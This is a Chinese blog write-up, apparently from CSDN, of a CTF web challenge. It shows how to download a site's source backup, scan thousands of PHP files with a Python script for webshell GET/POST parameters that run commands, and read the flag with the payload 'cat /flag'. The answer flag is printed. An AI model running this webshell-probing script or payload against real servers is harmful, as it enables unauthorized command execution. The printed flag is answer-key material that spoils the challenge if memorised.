[强网杯 2019]高明的黑客

最新推荐文章于 2023-08-17 14:59:42 发布
最新推荐文章于 2023-08-17 14:59:42 发布
阅读量432 收藏 4
点赞数 3
分类专栏: CTF 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120791373
版权

文章目录

题目

链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2

解答

1、打开网址
在这里插入图片描述
根据提示,存在网站源码备份

2、在网址后面加上/www.tar.gz,下载网站源码,打开
在这里插入图片描述
发现有3000多个文件,头疼…

3、随便打开一个文件
在这里插入图片描述
发现文件中很多shell,包括eval,system,exce,assert等函数

4、一个一个文件打开去找是不现实,故只能编写脚本,但是测试网址最后不要是题目网址,会因为请求过于频繁而返回不正常信息。
最好的办法是在本地搭建环境进行测试,我是在虚拟机中搭建了环境,说干就干,编写脚本

import os
import re
import requests
import threading
import time

path = r'C:\Users\DiliLearngent\Downloads\src'
Thread_num = 10
Flag = 0

#获取文件名列表,以线程数分类
def GetFile(path,Thread_num):
    # 获取所有的文件名
    file_name = os.listdir(path)
    #将所有元素分配到
    file_name_list = [file_name[i:i + Thread_num] for i in range(0, len(file_name), Thread_num)]
    # print(file_name_list)
    return file_name_list

#寻找一个文件中可用的参数并测试
def read_file(url,file_name):
    path1 = path+"\\"+file_name
    with open(path1, encoding='utf-8') as f:  # 打开php文件,提取所有的$_GET和$_POST的参数
        gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
        posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    param = {}       #存取所有get
    data = {}        #存取所有post
    for i in gets:
        param[i] = "echo 'hello world!';"
    for j in posts:
        data[j] = "echo 'hello world!';"

    #开始请求
    request = requests.session()
    url = url+file_name
    r = request.post(url,data=data,params=param)
    r.close()
    r.encoding = 'utf-8'
    content = r.text
    flag = 0
    if 'hello world!' in content:
        # print(file_name)
        for i in gets:
            req = requests.session().get(url=url+'?%s='%i+"echo 'hello world!';")
            req.encoding = 'utf-8'
            content = req.text
            # print(content)
            req.close()
            if "hello world!" in content:
                print("找到了可用文件:"+file_name+"    可用参数为:%s" %i+"   方式为Get")
                flag = 1
                break
            else:
                time.sleep(1)
            if flag==1:
                break
        if flag == 0:
            for i in posts:
                req = requests.session().post(url,data = {i:"echo 'hello world!';"})
                req.encoding = 'utf-8'
                content = req.text
                req.close()
                if "hello world!" in content:
                    print("找到了可用文件:"+file_name+"    可用参数为:%s" %i+"   方式为Post")
                    flag = 1
                    break
                else:
                    time.sleep(1)
    if flag==1:
        Flag = 1

#线程执行函数
def Fun_Thread(url,file_name_list):
    for i in file_name_list:
        if Flag==0:
            read_file(url,i)
            time.sleep(3)
        else:
            break


if __name__=="__main__":
    url = r"http://10.86.48.31/SRC/"
    file_name_list = GetFile(path=path,Thread_num=Thread_num)
    for i in file_name_list:
        t = threading.Thread(target=Fun_Thread,args=(url,i))
        t.start()

执行结果:
在这里插入图片描述
其实代码中那几个sleep可以不用,那是我在测试做题平台加上去的,奈何还是请求过于频繁
4、找到了正确的文件和参数后,就可以构造payload,美滋滋
payload:/xk0SzyKwfzw.php?Efa5BVG=cat /flag;
在这里插入图片描述
flag{2fc21854-6b1e-4ab9-8262-d0216037789a}
搞定!!!!

编写代码测试后一直不能找到文件,所以不断调试,结果是在url处少了一个?号,所以编写代码的时候一定要仔细

知识点

这里的知识点比较少,主要考察的是python代码编写的能力
关于python中requests的用法,后面会出一篇比较详细的博客

DiliLearngent
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】[强网杯 2019]高明黑客
aoao331198的博客
04-26 2304
拿到的源码有3000多个文件,所有文件都是杂乱的 网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。 用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码 import os import requests import re import threading import time print('开始时间: '+ time.asctime( time.localtime(time.ti.
CTF [强网杯 2019]高明黑客 writeup
baynk的博客
04-07 2046
一来搞下,有点意思,然后直接在url后面加上www.tar.gz进行下载文件下载,这文件有点大,下载的有点慢,我以为是出错了,又去扫目录。。wtf。。不管扫啥都是200。。。 不过好在,等扫描完了,文件下好了。 40M,真的狠,一打开,我惊了。 3000个文件。。命令看起来还没啥规则 。 硬着头皮解压后,随意点开一个文件。 1800多行。。。丢在本地环境里面去运行下,还尼玛报错了。 不...
[强网杯 2019]高明黑客(考察代码编写能力)
a3320315的博客
11-07 9596
0x01 试题分析 1、我们先打开题目,提示可以下载源码 下载源码,打开是几千个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,所以我们猜测这几千个php文件中肯定含有可以使用的shell,我们只有写脚本去试了。 0x02 脚本分析 – coding: utf-8 – import os import requests import re import...
[强网杯 2019]高明黑客(每日一题)
qq_51684648的博客
09-07 988
[强网杯 2019]高明黑客(每日一题) 1,打开网页,发现提示,下载文件 2,发现了三千多个php文件,打开几个文件,发现有可以传参的地方,尝试传参,但命令并没有被执行。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RfKq4Y6p-1631019565642)(https://i.loli.net/2021/09/07/yVeIzNdU5c8Ebar.png)] 3,猜测这三千多文件里有能被利用的shell,于是编写脚本尝试(我好菜,只能抄大佬们的脚本,在学了在学
【BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
[强网杯 2019]随便注.docx
最新发布
12-18
强网杯 2019】SQL 注入详解 SQL 注入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 注入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
[强网杯 2019] web题-高明黑客
BROTHERYY的博客
07-08 1009
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji
BUUCTF__[强网杯 2019]高明黑客_题解
风过江南乱的博客
05-31 1733
前言 其实这题的唯一考点就是编写 python 脚本。 用了几天时间来看一下 python ,发现有些内容与我以前学的c语言差不多,只是换个形式而已,比如说 if 、for 、while 对文件操作等等。那最大的特点就是很多功能函数,开箱既用,只需要引用模块就行了。可能这就是面向对象编程的特点吧,你不知道它怎么实现的,你只知道它能干什么。 也有很多不一样的,比如说,迭代、元组、继承、异常处理等等。 还有一点是python2 和python3。有点差别,比如说 print 函数等等,python3 有些东西
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
网安小趴菜
09-28 190
BUUCTF Web [强网杯 2019]高明黑客1 & [BJDCTF2020]Cookie is so stable1
[强网杯 2019]高明黑客1--writeup
m0_65080524的博客
08-17 91
www.tar.gz 即可下载到一个src文件但是里面存在很多杂乱的php文件,我们需要从中获取有用的文件。于是可以利用到脚本扫描指定路径下可疑的文件。
BUUCTF [强网杯 2019]高明黑客
qq_42158602的博客
01-14 1084
根据提示在url/www.tar.gz拿到源码 随便打开几个看看 有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3) import os import re import requests from multiprocessing import Pool filePath = "E:\phpstudy_pro\WWW\src" url = "http://1...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值